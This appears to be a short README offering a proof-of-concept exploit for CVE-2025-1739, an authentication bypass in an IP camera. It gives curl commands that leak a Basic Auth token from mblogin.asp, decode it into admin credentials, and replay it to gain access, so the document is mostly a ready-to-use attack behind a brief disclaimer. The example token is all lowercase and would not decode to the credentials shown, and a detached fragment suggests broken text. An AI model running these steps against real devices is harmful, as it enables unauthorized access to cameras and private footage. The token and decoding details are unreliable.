
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Authentication Bypass via Basic Auth Leak |
The camera leaks a valid Base64-encoded Basic Authentication token through the mblogin.asp endpoint. This token can be trivially decoded and reused to gain unauthorized access to the device — no password knowledge required.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
The response contains a valid Basic Auth token:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp and mblogin.asp.This repository is for educational and authorized security research only. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.